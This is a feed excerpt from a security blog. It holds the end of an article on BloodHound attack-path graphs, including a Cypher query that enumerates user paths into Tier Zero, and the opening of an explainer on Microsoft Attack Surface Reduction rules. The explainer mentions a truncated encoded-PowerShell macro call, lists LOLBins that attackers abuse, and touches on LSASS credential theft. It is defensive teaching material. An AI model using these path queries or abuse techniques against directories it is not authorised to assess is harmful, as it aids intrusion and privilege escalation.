&lt;p&gt;Unconstrained variable-length Cypher queries (&lt;code&gt;MATCH p=(a)-[*]-&amp;gt;(b)&lt;/code&gt;) can pin Neo4j&apos;s heap; CE&apos;s &quot;protected Cypher&quot; cost limits help but do not eliminate the problem, so prefer &lt;code&gt;shortestPath()&lt;/code&gt; or bound the path length explicitly. The wildcard-principal post-processing for &lt;code&gt;Authenticated Users&lt;/code&gt; and &lt;code&gt;Everyone&lt;/code&gt; requires v6.0 or later to be correct; older versions miscount these edges [@bloodhound-v6-0-release]. And the &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; edge is Group to Computer, not Computer to Computer, as discussed in Section 7.&lt;/p&gt;

```cypher
MATCH (n)
WHERE n.system_tags CONTAINS &apos;admin_tier_0&apos;
WITH collect(n) AS tier_zero
MATCH p = shortestPath((u:User {enabled:true})-[*1..6]-&amp;gt;(t))
WHERE t IN tier_zero AND NOT u.system_tags CONTAINS &apos;admin_tier_0&apos;
RETURN u.name AS source, t.name AS target, length(p) AS hops
ORDER BY hops ASC
LIMIT 25
```&lt;p&gt;This returns up to 25 enabled non-Tier-Zero users with the shortest paths into Tier Zero. The &lt;code&gt;[*1..6]&lt;/code&gt; bound prevents the pathological cyclic-graph cost explosion. Bound length aggressively until you have indexed your graph.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;

BloodHound is dual-use. Authorised defensive use on your own forest, or contracted penetration testing within written scope, is the standard legal posture. Running it against a directory you are not authorised to assess is unlawful in most jurisdictions: the Computer Fraud and Abuse Act in the United States; the Computer Misuse Act 1990 in the United Kingdom; equivalents in most EU jurisdictions. The dual-use posture is fundamental to the tool; the legal posture depends on you.
&lt;p&gt;The tool is the easy part. The hard part is what you do with the answer.&lt;/p&gt;
&lt;h2&gt;13. Frequently asked questions&lt;/h2&gt;
&lt;p&gt;The misconceptions worth disposing of, in order of how often they recur.&lt;/p&gt;

No. BloodHound is the SpecterOps-maintained, evolving set of edge families. File-system ACLs on member servers, fine-grained GPO delegation, on-host service-account permissions, and some Entra conditional-access logic remain partially or fully out of scope. The `SpecterOps/TierZeroTable` README is explicit about this limitation [@specterops-tier-zero-table]. Coverage expansion is iterative and community-fed; OpenGraph is the structural answer to scope generalisation.

The original BloodHound (2016) shipped Neo4j only. The modern BloodHound CE uses *both*: PostgreSQL as the application database (users, roles, sessions, audit logs) and Neo4j as the graph layer [@bloodhound-ce-repo]. BloodHound Enterprise has begun migrating entirely off Neo4j onto PostgreSQL-as-graph (announced in v6.3, December 2024) [@bloodhound-v6-3-release]; Cypher continues to be the query language on the new backend. The model is engine-independent; Adalanche proves the same point by doing it all in process memory in Go [@adalanche-repo].

Authorised defensive use on your own forest, yes. Contracted penetration testing within written scope, yes. Running it against a directory you are not authorised to assess is unlawful in most jurisdictions: the Computer Fraud and Abuse Act in the United States, the Computer Misuse Act 1990 in the United Kingdom, and equivalents in most EU jurisdictions. The dual-use posture is fundamental to the tool; legal compliance is the operator&apos;s responsibility.
&lt;h2&gt;Epilogue&lt;/h2&gt;
&lt;p&gt;The 2014 analyst with the whiteboard and the 2024 analyst with the Cypher query are doing the same work. The unit of analysis has shifted, and once the unit shifts, the field does not go back.&lt;/p&gt;
&lt;p&gt;John Lambert diagnosed it in two sentences in April 2015 [@lambert-2015-defenders-lists-attackers-graphs]. Andy Robbins, Rohan Vazarkar, and Will Schroeder shipped it as BloodHound in August 2016 [@bloodhound-legacy-repo]. SpecterOps extended it through AzureHound in 2020, the CE 5.0 web architecture in 2023, the Tier Zero formalisation in 2023, ADCS composed edges in 2024, Butterfly bi-directional analysis in 2024, and OpenGraph in 2025 [@specterops-2025-opengraph].&lt;/p&gt;
&lt;p&gt;Microsoft validated the model with Lateral Movement Paths in 2018, cloud security graph attack-path analysis in 2022 to 2023, and Microsoft Security Exposure Management at Ignite in 2024 [@ms-msem-attack-paths]. The community that shipped the graph won; the community that kept shipping lists is selling compliance reports to the auditors.&lt;/p&gt;
&lt;p&gt;The frontier in 2026 is not whether to model attacks as a graph -- that argument is settled. The frontier is how to make the graph weighted (so the shortest path approximates the easiest), how to make it complete (so the unmodelled edges shrink toward zero), and how to make it substrate-independent (so the next enterprise primitive worth modelling -- whatever it turns out to be -- can be ingested without changing the engine). Each of these is a research direction with its own asymptotic ceiling, its own engineering practice, and its own community of contributors.&lt;/p&gt;
&lt;p&gt;What started as a sentence in a 1,100-word essay on a personal GitHub repository is now an ISO-standardised query language [@iso-39075-2024-gql], a shipped Microsoft product family, an open-source repository with hundreds of thousands of downloads, and a discipline taught at most major security conferences. The graph wins because the graph is the right model. The right model wins because, eventually, the right model always does.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;bloodhound-attack-path-graph&quot; keyTerms={[
  { term: &quot;Attack-path graph&quot;, definition: &quot;A directed graph whose nodes are security principals and resources and whose edges are privilege relationships an attacker can traverse. Reachability in the graph models multi-hop privilege escalation.&quot; },
  { term: &quot;Directed property graph&quot;, definition: &quot;A graph in which both nodes and edges have types and can carry key-value properties. The data model BloodHound uses.&quot; },
  { term: &quot;Cypher&quot;, definition: &quot;The pattern-matching query language for Neo4j and now the basis of the ISO/IEC 39075:2024 GQL standard.&quot; },
  { term: &quot;Bidirectional BFS&quot;, definition: &quot;Breadth-first search executed simultaneously from source and target, meeting in the middle. The algorithm Neo4j&apos;s shortestPath() runs and the algorithm BloodHound inherits.&quot; },
  { term: &quot;Tier Zero&quot;, definition: &quot;Any node in the attack-path graph whose compromise lets an attacker reach an administrative privilege in the forest. The endpoint of every BloodHound shortest-path query.&quot; },
  { term: &quot;Traversable / non-traversable edge&quot;, definition: &quot;A traversable edge can be stepped through directly by a path query; a non-traversable edge is a precondition fact that, with others, composes into a traversable edge during post-processing. ADCS edges are the canonical example.&quot; },
  { term: &quot;OpenGraph&quot;, definition: &quot;BloodHound&apos;s v8.0 (July 2025) generalisation that decouples the graph engine from the AD-specific schema, admitting user-defined node and edge kinds for arbitrary substrates.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>active-directory</category><category>bloodhound</category><category>graph-theory</category><category>attack-paths</category><category>specterops</category><category>identity-security</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Attack Surface Reduction Rules: The Quiet Layer That Stopped Office Macros</title><link>https://paragmali.com/blog/attack-surface-reduction-rules-the-quiet-layer-that-stopped-/</link><guid isPermaLink="true">https://paragmali.com/blog/attack-surface-reduction-rules-the-quiet-layer-that-stopped-/</guid><description>How Microsoft built a 19-rule, kernel-mediated behaviour block list inside Windows Defender that turned the Emotet macro chain into a one-row, no-ticket telemetry event.</description><pubDate>Tue, 26 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Attack Surface Reduction (ASR) rules are Microsoft&apos;s nineteen-rule, kernel-mediated, free-with-Windows behaviour block list.** Each rule names a single edge in the runtime process / file-system / registry graph -- Office spawning child processes, scripts launching downloaded executables, processes opening LSASS, vulnerable signed drivers being written -- and refuses to let it happen. Shipping since Windows 10 1709 (October 2017) [@ms-security-blog-exploit-guard-2017], the rules killed the cheap end of the Office-macro initial-access chain at the enterprise tier; the Microsoft 365 Apps default block of internet-marked macros (February and July 2022) [@ms-techcommunity-internet-macros-2022] and Europol&apos;s Operation LadyBird (January 2021) [@europol-emotet-disrupted-wayback] finished the era at the consumer tier and the C2 tier respectively. The layer is incomplete by construction -- Cohen-1984 undecidability forbids a complete behaviour catalogue [@cohen-1984-part1] -- but it compresses attacker bypass cost so effectively that the SOC routinely does not triage the blocks. Every rule emits a rule-specific Advanced Hunting `ActionType` such as `AsrOfficeChildProcessBlocked`; the folk-knowledge generic `AsrRuleTriggered` does not exist [@ms-learn-asr-reference].
&lt;h2&gt;1. One Block, No Analyst Ticket&lt;/h2&gt;
&lt;p&gt;At 03:42 on a Tuesday morning in Frankfurt, a finance analyst opens an invoice attached to an email that looks like one she has answered fifty times before. The document&apos;s &lt;code&gt;Document_Open&lt;/code&gt; macro fires, the VBA calls &lt;code&gt;Shell(&quot;powershell.exe -enc ...&quot;)&lt;/code&gt;, and nothing happens. No PowerShell window. No second-stage download. No banking-trojan loader. No ransom note three weeks later. The only artefact is one row in Microsoft Defender for Endpoint&apos;s &lt;code&gt;DeviceEvents&lt;/code&gt; table, with &lt;code&gt;ActionType&lt;/code&gt; equal to &lt;code&gt;AsrOfficeChildProcessBlocked&lt;/code&gt;, that no analyst will triage because there is nothing left to triage [@ms-learn-asr-reference].&lt;/p&gt;
&lt;p&gt;That row, and the silence around it, is the entire subject of this article.&lt;/p&gt;
&lt;p&gt;To understand why nothing happened, watch the call in slow motion. &lt;code&gt;WINWORD.EXE&lt;/code&gt; is a long-running user-mode process. The macro&apos;s process-creation call crosses the syscall boundary into the kernel&apos;s process-management subsystem, where &lt;a href=&quot;https://paragmali.com/blog/the-defenders-dilemma-microsoft-antivirus/&quot; rel=&quot;noopener&quot;&gt;Microsoft Defender Antivirus&lt;/a&gt; has registered a process-creation notify routine. Defender&apos;s kernel-mode driver &lt;code&gt;WdFilter.sys&lt;/code&gt; -- registered with the Windows Filter Manager as a file-system minifilter AND with the kernel&apos;s process subsystem via &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt; -- intercepts the event through its process-creation notify routine before the new process runs and hands it to the user-mode antivirus engine &lt;code&gt;MsMpEng.exe&lt;/code&gt;. (Section 5 walks the kernel/user-mode split in full.) &lt;code&gt;MsMpEng.exe&lt;/code&gt; evaluates the rule with GUID &lt;code&gt;D4F940AB-401B-4EFC-AADC-AD5F3C50688A&lt;/code&gt; -- &quot;Block all Office applications from creating child processes&quot; [@ms-learn-asr-reference]. The predicate evaluates true. The rule is set to Block. The minifilter fails the operation. The macro gets a non-zero error from its process-creation call. The spawn never happens.&lt;/p&gt;

A fixed catalogue of behavioural blocks shipped as a feature of Microsoft Defender Antivirus on Windows 10 1709 and later, Windows 11, and supported Windows Server editions. Each rule names a specific runtime behaviour -- &quot;Office applications creating child processes,&quot; &quot;credential stealing from the Windows local security authority subsystem,&quot; &quot;abuse of exploited vulnerable signed drivers&quot; -- and can be enabled in Audit, Warn, or Block mode through Microsoft Intune, Microsoft Configuration Manager, Group Policy, PowerShell, or the Defender for Endpoint portal. As of May 2026 the catalogue contains nineteen rules: three Standard protection rules and sixteen Other ASR rules [@ms-learn-asr-reference].
&lt;p&gt;Notice what the rule did not do. It did not classify the binary. Both &lt;code&gt;WINWORD.EXE&lt;/code&gt; and &lt;code&gt;powershell.exe&lt;/code&gt; are signed by Microsoft. Both have multi-decade Authenticode reputation. Both have appeared on every reasonable allow-list since Windows 7. A signature engine, asked &quot;is the macro malicious,&quot; would have had to read the macro&apos;s bytes, normalise its obfuscation, and decide whether the sequence of Office object-model calls plus a base64 blob constitutes hostile intent. That decision is hard in the easy cases and undecidable in general. The rule sidestepped the whole question. It classified the &lt;strong&gt;edge&lt;/strong&gt; between two perfectly legitimate signed binaries: &lt;code&gt;WINWORD.EXE&lt;/code&gt; becoming the parent of &lt;code&gt;powershell.exe&lt;/code&gt;. The bytes are not the predicate. The parent-child relationship is.&lt;/p&gt;
&lt;p&gt;The folklore that &quot;every ASR block emits &lt;code&gt;ActionType == &apos;AsrRuleTriggered&apos;&lt;/code&gt;&quot; survives in vendor playbooks and Stack Overflow answers but does not match Microsoft Learn&apos;s current rules reference, which enumerates a rule-specific &lt;code&gt;Asr&amp;lt;RuleName&amp;gt;Audited&lt;/code&gt; and &lt;code&gt;Asr&amp;lt;RuleName&amp;gt;Blocked&lt;/code&gt; pair for every rule except the server-only Webshell rule. The canonical Advanced Hunting filter is &lt;code&gt;where ActionType startswith &quot;Asr&quot;&lt;/code&gt;, not equality against a generic value [@ms-learn-asr-reference].&lt;/p&gt;
&lt;p&gt;The Frankfurt analyst&apos;s hypothetical Tuesday is one of millions. Defender Antivirus ships on every supported edition of Windows [@ms-learn-asr-reference]. The Office-child-process rule has been blockable since October 2017 [@ms-security-blog-exploit-guard-2017]. It is not the only ASR rule, and ASR is not the only layer that ended the Emotet macro era. Europol&apos;s January 27, 2021 takedown and the Microsoft 365 Apps default block of internet macros in February and July 2022 share the credit. But ASR is the layer with the deepest enforcement substrate (a kernel-mode minifilter), the fullest behavioural catalogue (nineteen rules naming specific runtime edges), and the simplest mental model for a defender: name a behaviour, ship an enforcement edge, audit, then block.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Signature engines classify nodes (is this binary malicious?). AppLocker classifies identities (is this binary on the allow-list?). ASR classifies edges in the runtime graph (did this specific parent-child invocation happen?). Section 5 builds the framework. The catalogue in Section 6 reads as nineteen named edges once you see it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The rest of the article walks the ten questions the Frankfurt block raises. If signatures cannot tell us whether the analyst&apos;s macro is malicious -- because both binaries are signed and the static fingerprint of the macro changes every campaign -- how exactly did one row in &lt;code&gt;DeviceEvents&lt;/code&gt; know to fire? What does the kernel see that the signature engine does not? Why did three predecessor paradigms (signatures, AppLocker, EMET) fail to close this specific gap, and what made October 2017 the moment Microsoft decided to ship a behaviour catalogue instead of a better classifier? Section 2 starts with the empirical signal that forced the shift.&lt;/p&gt;
&lt;h2&gt;2. Why Signatures Stopped Being Enough&lt;/h2&gt;
&lt;p&gt;By the time Microsoft published the October 23, 2017 Windows Defender Exploit Guard launch announcement, the team had a single sentence ready for the executive summary: &quot;fileless attacks, which compose over 50% of all threats&quot; [@ms-security-blog-exploit-guard-2017]. That line did two jobs. It justified shipping ASR. It also marked the moment the signature model hit its industrial-scale ceiling.&lt;/p&gt;

Despite advances in antivirus detection capabilities, attackers are continuously adapting ... This emerging trend of fileless attacks, which compose over 50% of all threats, are extremely dangerous, constantly changing, and designed to evade traditional AV. -- Microsoft Threat Intelligence team, October 23, 2017 [@ms-security-blog-exploit-guard-2017]
&lt;p&gt;The 50-percent number is a 2017-vintage Microsoft characterisation, not a peer-reviewed empirical study, but it captures a structural shift that every endpoint-defence vendor had been watching for three years. Three forces had converged.&lt;/p&gt;
&lt;p&gt;First, mature crypters and packers had defeated static signatures. The classic AV pipeline -- compute a hash, match against a corpus of known-bad hashes -- assumed attackers shipped a small number of stable binaries. By 2017 the typical commodity malware family rebuilt its payload on every campaign, layered three encryption stages, and emerged as a polymorphic blob whose static fingerprint changed faster than the signature feed. Fred Cohen had warned in 1984 that any complete malicious-program detector reduces to the Halting Problem [@cohen-1984-part1]; commodity packers were the industrial-scale form of that result.&lt;/p&gt;
&lt;p&gt;Second, attackers had moved off custom binaries entirely. The Living-Off-the-Land Binaries, Scripts, and Libraries project -- LOLBAS -- catalogues over two hundred Microsoft-signed Windows binaries that attackers use to execute malicious behaviour without dropping any malware artefact on disk [@lolbas-project]. &lt;code&gt;powershell.exe&lt;/code&gt;, &lt;code&gt;cmd.exe&lt;/code&gt;, &lt;code&gt;wscript.exe&lt;/code&gt;, &lt;code&gt;mshta.exe&lt;/code&gt;, &lt;code&gt;regsvr32.exe&lt;/code&gt;, &lt;code&gt;rundll32.exe&lt;/code&gt;, &lt;code&gt;cmstp.exe&lt;/code&gt;, &lt;code&gt;msdt.exe&lt;/code&gt;, &lt;code&gt;msbuild.exe&lt;/code&gt;, &lt;code&gt;installutil.exe&lt;/code&gt; -- all signed by Microsoft, all on every reasonable allow-list, all capable of executing arbitrary code given the right command line. The on-disk artefact is benign; the malice lives in the runtime edge between two signed binaries.&lt;/p&gt;

A signed Microsoft Windows binary that attackers use to execute malicious behaviour while staying off identity-based allow-lists. The LOLBAS Project enumerates over two hundred such binaries together with the abuse classes each enables and the MITRE ATT&amp;amp;CK techniques each maps to [@lolbas-project].
&lt;p&gt;Third, Office macros had become the dominant initial-access vector. Emotet first appeared as a banking trojan in June 2014; by 2017 it had transformed into a crime-as-a-service loader platform that delivered TrickBot, Dridex, IcedID, and eventually Conti and Ryuk to its access buyers [@welivesecurity-emotet-pivot-2022]. The delivery vehicle barely changed across that pivot: a Word or Excel document, a Visual Basic for Applications macro, a call into &lt;code&gt;Shell&lt;/code&gt;, &lt;code&gt;WScript.Shell.Run&lt;/code&gt;, or the Windows Management Instrumentation provider to spawn the next stage. The malice was never inside &lt;code&gt;WINWORD.EXE&lt;/code&gt;. The malice was in the edge that connected &lt;code&gt;WINWORD.EXE&lt;/code&gt; to whichever signed Microsoft binary the operator decided to spawn.&lt;/p&gt;

The NTFS alternate data stream `Zone.Identifier` written by browsers, mail clients, and archive extractors to flag a file as originating from outside the local machine. Office uses the MOTW to drop a downloaded document into Protected View; the February 2022 Microsoft 365 Apps internet-macro default block treats the MOTW as the trigger to remove the &quot;Enable Content&quot; button entirely [@ms-learn-internet-macros-blocked].
&lt;p&gt;The pre-2017 defence stack covered slices of this problem, but no layer covered the specific behaviour class &quot;an Office application creates a child process.&quot; AV signatures and heuristics scored the binaries; both were signed Microsoft binaries. AppLocker (2009) decided whether a binary was allowed to run; both were on the allow-list. EMET (2009) blocked memory-corruption exploit primitives; the macro chain involved no memory corruption. Reputation-based file blocking covered downloaded payloads; the payload was a base64 string passed on the PowerShell command line, never written to disk. Each layer answered a different question. None answered the question the macro chain raised.&lt;/p&gt;
&lt;p&gt;The strategic shift Microsoft eventually made was small in the framing and enormous in the consequences. Instead of asking &quot;is this binary malicious?&quot; -- a question undecidable in general -- the next layer would ask &quot;did the suspicious behaviour happen?&quot; The new question is decidable per event at the OS interception layer, because the kernel sees every process-creation call, every image load, every file write, every registry set. Edge classification does not require static analysis; it requires only that the kernel be wired to ask one extra predicate before completing the operation.&lt;/p&gt;
&lt;p&gt;The named author at the bottom of the 2017 launch post body (fetched 2026-05-26) is &lt;strong&gt;Misha Kutsovsky (@mkutsovsky), Program Manager, Windows Active Defense&lt;/strong&gt;. The top-of-page byline and &lt;code&gt;&amp;lt;meta name=&quot;author&quot;&amp;gt;&lt;/code&gt; tag have since been consolidated under the &quot;Microsoft Threat Intelligence&quot; institutional account during Microsoft&apos;s 2022-2025 re-platforming of older Security Blog posts; the in-body attribution is unchanged. This article cites the institutional author as it appears in the page head; the named person at the bottom of the body is Kutsovsky [@ms-security-blog-exploit-guard-2017].&lt;/p&gt;
&lt;p&gt;One taxonomy point deserves its own paragraph, because confusion about it shapes most beginner questions about ASR. &lt;strong&gt;Microsoft Defender Antivirus&lt;/strong&gt; is the on-host scanning engine that ships free with every Windows edition. &lt;strong&gt;Microsoft Defender for Endpoint (MDE)&lt;/strong&gt; is the cloud-managed EDR layer Microsoft sells on top. ASR rules live inside Defender Antivirus. They run whether or not the device is enrolled in MDE. MDE adds management, telemetry ingestion through the &lt;code&gt;DeviceEvents&lt;/code&gt; table, and Advanced Hunting; it does not add the enforcement. The Frankfurt block fires in Defender Antivirus; the &lt;code&gt;DeviceEvents&lt;/code&gt; row only reaches MDE if MDE is connected. The EDR-in-block-mode page is explicit on the dependency: ASR rules run only when Defender Antivirus is in Active mode, never when a third-party AV is primary and Defender is passive [@ms-learn-edr-in-block-mode].&lt;/p&gt;
&lt;p&gt;By 2014-2015 the Microsoft Defender team had identified the problem. They did not invent the answer from scratch. They inherited a Windows defence stack that had been trying to solve the same problem for sixteen years, in three earlier paradigms. What were they, and why did none of them stop Emotet?&lt;/p&gt;
&lt;h2&gt;3. AppLocker, EMET, and What They Could Not Do&lt;/h2&gt;
&lt;p&gt;Three predecessor paradigms. Three different failures. Three different lessons that Microsoft eventually folded into the design of ASR.&lt;/p&gt;
&lt;h3&gt;AppLocker (2009, Windows 7)&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;AppLocker&lt;/a&gt; was the identity-based answer to the question &quot;which binaries are allowed to run on this endpoint?&quot; Administrators write rules that allow or deny executable code by publisher, by path, or by file hash; the kernel enforces the policy at process-creation time. Microsoft Learn still describes AppLocker as the Windows 7-era predecessor to App Control for Business, and the design has not changed structurally in the intervening sixteen years [@ms-learn-applocker]. AppLocker is genuinely stricter than ASR on the identity axis. A well-tuned AppLocker policy on a hardened endpoint enforces default-deny: only allowed publishers, only allowed paths, only allowed hashes ever execute.&lt;/p&gt;
&lt;p&gt;AppLocker has two practical weaknesses and one structural one. The first practical weakness is brittleness against signed LOLBins: &lt;code&gt;powershell.exe&lt;/code&gt;, &lt;code&gt;cmd.exe&lt;/code&gt;, &lt;code&gt;wscript.exe&lt;/code&gt;, &lt;code&gt;mshta.exe&lt;/code&gt;, &lt;code&gt;regsvr32.exe&lt;/code&gt;, &lt;code&gt;rundll32.exe&lt;/code&gt;, &lt;code&gt;cmstp.exe&lt;/code&gt;, &lt;code&gt;msdt.exe&lt;/code&gt;, &lt;code&gt;msbuild.exe&lt;/code&gt;, &lt;code&gt;installutil.exe&lt;/code&gt; are all on every reasonable AppLocker allow-list because every legitimate IT-automation pipeline depends on them [@lolbas-project]. The second is admin-deployment overhead: every new line-of-business application needs an explicit rule addition, large estates fall back to Audit mode permanently, and exception sprawl turns the policy into a sieve.&lt;/p&gt;
&lt;p&gt;The structural weakness is the one that matters here. The AppLocker rule grammar has no slot for &quot;&lt;code&gt;WINWORD.EXE&lt;/code&gt; may run, but it may not be the parent of &lt;code&gt;cmd.exe&lt;/code&gt;.&quot; That sentence is a property of an edge in the runtime graph, and the AppLocker schema models nodes, not edges.&lt;/p&gt;
&lt;h3&gt;EMET (2009-2018)&lt;/h3&gt;
&lt;p&gt;The Enhanced Mitigation Experience Toolkit was Microsoft&apos;s per-process opt-in exploit-time mitigation framework. Data Execution Prevention, Address Space Layout Randomization, Structured Exception Handler Overwrite Protection, the Export Address Table Access Filter, anti-Return-Oriented-Programming heuristics, caller-checks, heap-spray pre-allocation -- EMET stitched the menu together for any process the administrator opted in. EMET stopped buffer overflows from achieving code execution. It made the cheap exploit-development pipeline visibly more expensive.&lt;/p&gt;
&lt;p&gt;EMET did not stop the Emotet macro chain. The chain involved no memory corruption. The chain was a legitimately loaded, uncorrupted, signed Office application making a perfectly ordinary user-mode parent-child process-creation call. There was no exploit primitive to mitigate. The 2017 Exploit Guard launch announcement said the same in cleaner language: &lt;a href=&quot;https://paragmali.com/blog/process-mitigation-policies-cfg-acg-cig-and-the-layer-betwee/&quot; rel=&quot;noopener&quot;&gt;Exploit Protection&lt;/a&gt; (the Windows-integrated pillar that absorbed EMET&apos;s mitigations) and Attack Surface Reduction (the new pillar) cover different gaps, because exploit-time mitigations and post-exploit behaviour blocks address different attacker stages [@ms-security-blog-exploit-guard-2017]. EMET reached end-of-life on July 31, 2018 per the Microsoft product lifecycle page [@ms-lifecycle-emet]; its mitigations live on under different names in the Exploit Protection panel of Windows Security.&lt;/p&gt;
&lt;h3&gt;Signature and heuristic AV&lt;/h3&gt;
&lt;p&gt;The third predecessor is the one Cohen&apos;s 1984 paper had already analysed. Signature and heuristic AV classify nodes, which is to say they answer &quot;is this binary, considered as a sequence of bytes, malicious?&quot; Cohen proved that the general form of that question reduces to the Halting Problem. The verbatim sentence from his open-access archive is the cleanest one-line statement of the result [@cohen-1984-part1]:&lt;/p&gt;

The classical result, established in Fred Cohen&apos;s 1984 paper &quot;Computer Viruses: Theory and Experiments&quot; (presented at the 7th DoD/NBS Computer Security Conference and reprinted in Computers and Security 6(1):22-35 in January 1987), that detection of arbitrary viral behaviour in a program reduces to the Halting Problem. The diagonal construction assumes a decider `D(P)` for viral behaviour; constructs a program `V` that calls `D(V)` and behaves virally iff `D(V) = 0`; derives a contradiction. The corollary -- any non-trivial semantic property of programs is undecidable -- is the Rice-1953 generalisation [@cohen-1984-part1].
&lt;p&gt;The practical version of the ceiling for the Emotet case is that a signature engine cannot, in general, distinguish a Word macro that legitimately spawns &lt;code&gt;cmd.exe&lt;/code&gt; to run an IT-automation script from a Word macro that spawns &lt;code&gt;cmd.exe&lt;/code&gt; to launch the Emotet stage-two PowerShell stub. Both call the same Win32 API. Both pass argument strings the engine cannot prove are malicious without modelling the operator&apos;s intent. The fingerprint of the malice is not in the binaries; it is in the runtime relationship between them.&lt;/p&gt;

The three paradigms -- signature, identity, edge -- are not redundant. Modern defence-in-depth runs all three because each closes a different attacker option. Signatures detect known-bad binaries cheaply; identity controls restrict which binaries may run at all; edge classification refuses specific behavioural relationships among allowed binaries. AppLocker without ASR lets `WINWORD` spawn PowerShell. ASR without AppLocker permits any unsigned binary to ship with the next campaign. Neither alone covers the gap. Section 7 makes the layering explicit as a comparison matrix.
&lt;p&gt;The three together demonstrate that the Windows endpoint defence stack of 2017 was structurally node-classifying or identity-classifying, with no layer modelling the runtime edge. The strategic gap is the slot ASR was designed to fill.&lt;/p&gt;
&lt;p&gt;On October 17, 2017, Microsoft shipped Windows 10 Fall Creators Update (build 1709) [@windows-blog-fall-creators-update-2017]. Six days later, the Microsoft Security Blog named the new pillar: Attack Surface Reduction [@ms-security-blog-exploit-guard-2017]. What did the first eight rules do, and how did they finally model the edge that AppLocker, EMET, and signatures could not?&lt;/p&gt;
&lt;h2&gt;4. The Evolution, Generation by Generation&lt;/h2&gt;
&lt;p&gt;October 23, 2017. The Microsoft Security Blog publishes &quot;Windows Defender Exploit Guard: Reduce the attack surface against next-generation malware&quot; [@ms-security-blog-exploit-guard-2017]. The post names four pillars: Attack Surface Reduction, Network Protection, Controlled Folder Access, and Exploit Protection. The first pillar ships with eight rules. Nine years later the catalogue is nineteen rules wide. Each generation closed a specific attacker behaviour; each generation produced a published bypass within months.&lt;/p&gt;

flowchart TD
    G1[&quot;Gen 1 - Oct 2017 (1709) - 8 Office, script, email rules&quot;]
    G2[&quot;Gen 2 - 2018-2019 (1803-1903) - LSASS, PSExec/WMI, prevalence, Adobe, WMI persistence&quot;]
    G3[&quot;Gen 3 - Apr 2020 - Warn mode added, platform 4.18.2008.9&quot;]
    G4a[&quot;Gen 4a - Dec 2021 / 2022 - BYOVD rule, Vulnerable Driver Reporting Center&quot;]
    G4b[&quot;Gen 4b - Feb/Jul 2022 - Parallel layer, M365 Apps internet-macro default block&quot;]
    G5[&quot;Gen 5 - 2023-2026 - Standard protection partition, Webshell, Safe Mode reboot, copied tools, USB, Outlook child-process rules&quot;]
    G1 --&amp;gt; G2 --&amp;gt; G3 --&amp;gt; G4a --&amp;gt; G4b --&amp;gt; G5
&lt;h3&gt;Generation 1, October 2017 -- the eight launch rules&lt;/h3&gt;
&lt;p&gt;The launch rules, as listed verbatim in the 2017 announcement, are the Office-macro response pack [@ms-security-blog-exploit-guard-2017]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Block Office applications from creating executable content&lt;/li&gt;
&lt;li&gt;Block Office applications from launching child processes&lt;/li&gt;
&lt;li&gt;Block Office applications from injecting into other processes&lt;/li&gt;
&lt;li&gt;Block Win32 imports from macro code in Office&lt;/li&gt;
&lt;li&gt;Block obfuscated macro code (and other obfuscated scripts, AMSI-backed)&lt;/li&gt;
&lt;li&gt;Block JavaScript or VBScript from launching downloaded executable content&lt;/li&gt;
&lt;li&gt;Block execution of executable content dropped from email or webmail&lt;/li&gt;
&lt;li&gt;Block malicious JavaScript and VBScript scripts (AMSI-backed)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;None of these rules solves a node-classification problem. Each rule names a single edge in the runtime process / file-system / registry graph and refuses to let it happen. &quot;Block Office applications from creating child processes&quot; is not &quot;is &lt;code&gt;WINWORD.EXE&lt;/code&gt; malicious?&quot; but &quot;did &lt;code&gt;WINWORD.EXE&lt;/code&gt; just try to be the parent of another process?&quot; The kernel answers the question with one comparison against the parent image path.&lt;/p&gt;
&lt;h3&gt;Generation 2, 2018-2019 -- credential theft, lateral movement, persistence&lt;/h3&gt;
&lt;p&gt;Between Windows 10 1803 (April 2018) and 1903 (May 2019) the catalogue expanded beyond Office to the rest of the attacker intrusion chain. Six new rules with their GUIDs, from the Microsoft Learn rules reference [@ms-learn-asr-reference]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Block credential stealing from the Windows local security authority subsystem&lt;/strong&gt; -- &lt;code&gt;9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2&lt;/code&gt; -- introduced 1803. The &lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;Mimikatz&lt;/a&gt; response: refuse process handles to &lt;code&gt;lsass.exe&lt;/code&gt; with rights sufficient to read its address space.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Block executable files from running unless they meet a prevalence, age, or trusted list criterion&lt;/strong&gt; -- &lt;code&gt;01443614-cd74-433a-b99e-2ecdc07bfc25&lt;/code&gt; -- 1803. The unique-binary-per-campaign response, leaning on cloud-protection (MAPS) reputation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Block process creations originating from PSExec and WMI commands&lt;/strong&gt; -- &lt;code&gt;d1e49aac-8f56-4280-b9ba-993a6d77406c&lt;/code&gt; -- 1803. The Emotet lateral-movement response.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Use advanced protection against ransomware&lt;/strong&gt; -- &lt;code&gt;c1db55ab-c21a-4637-bb3f-a12568109d35&lt;/code&gt; -- 1803. The mass-encryption-detection response, also cloud-protection-dependent.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Block Adobe Reader from creating child processes&lt;/strong&gt; -- &lt;code&gt;7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c&lt;/code&gt; -- 1809. The PDF-exploit-spawning-payload response.&lt;/li&gt;
